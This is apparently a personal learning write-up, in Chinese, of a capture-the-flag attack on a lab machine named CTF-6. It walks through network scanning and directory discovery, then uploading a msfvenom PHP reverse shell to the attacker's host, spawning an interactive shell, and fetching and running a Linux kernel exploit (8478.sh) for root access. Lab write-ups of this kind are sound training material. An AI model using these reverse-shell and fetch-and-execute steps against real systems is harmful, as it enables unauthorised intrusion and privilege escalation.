继续记录自己打靶的学习过程
1、靶机设置:
kali和ctf-6全部设置为NAT模式
2、端口探测:
可以看到kali的IP为:192.168.234.152,然后扫描整个C段。
sudo nmap -sn 192.168.234.0/24
可以看到新增的IP为 192.168.234.153这个应该就是CTF-6靶机。
3、信息收集:
sudo nmap -sV -O -p- --min-rate 10000 192.168.234.153 -oA nmapscan/ports
参数解释:
-sV 探测目标对象开放的服务
-O 探测目标对象的操作系统
-p- 探测目标开放的所有端口
--min-rate 10000 以10000的速率进行扫描
-oA 将结果全格式的保存到ports中
可以看到开放的端口有点多,将这些端口保存下载。
参数解释:
grep open 查找open这个字段
awk -F '/' '{print $1}' 以'/',作为分割查找第一字段
paste -sd ',' 将竖直的内容变为水平的并以','分割
>ports 保存到ports中
awk的使用教程:https://www.cnblogs.com/zhengyan6/p/16290156.html
(1)扫描端口:
sudo nmap --script=vuln -p22,80,110,111,143,443,623,993,995,3306 192.168.234.153 -oA nmapscan/vuln
啊,好长懒得截那么多,把重要的截出来。
重点看80端口
有个cve,查了下是个mysql的身份绕过漏洞,先记着。
(2)网站后台探测:
dirsearch -u http://192.168.234.153 -x300,301,302,303,304,400,401,402,403,404,500,501,502,503,504,429
简单试了两个,看见有个账号密码,盲猜是mysql的账号密码。
试了一下报错了,转别思路感觉是网站的账号密码,试试。
进了,但没完全进什么都没有。(后来在edge浏览器试了下)
可以看到有个上传点。
(3)生成shell:
弹弹弹弹shell,那就开始搞后门的php吧。
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.234.152 lport=4444 >shell.php
-p payload设置生成的后门
lhost 本机的IP地址
lport 监听的端口
(4)开启msf:
- use exploit/multi/handler
- set payload php/meterpreter_reverse_tcp
- set lhost 192.168.234.152
run一下(弹不上来的话点一下home目录)
- shell
- python -c 'import pty;pty.spawn("/bin/bash")'
从到这常规的提权和查提权,sudo -l好像不行
那就试试find提权
find / -perm -4000 2>/dev/null
也不行......从这我是走不下去了,看了一下大佬的思路,还有一种环境版本漏洞。
(5)查找版本漏洞:
将它下载下来
searchsploit linux 2.6 -m 8478.sh
现在的思路是开放一个kali页面,在靶机上wget爬取下来然后执行。(那就进行下去)
4.1开放kali80的端口:
新建一个php文件夹保存进去开放80端口
python -m http.server 80
(1)进入/tmp目录下载wget下来:
可以cat 8478.sh 有提示
wget http://192.168.234.152/8478.sh
赋予超级权限
chmod +x 8478.sh
查看进程号
(2)执行.sh的bash脚本
- cat /proc/net/netlink
- ./8478.sh 568 (利用一个高权限进程)
第一次没有成功第二次就可以了
验证一下
4.2upload上传反弹shell
后续利用同上一样!
至此结束!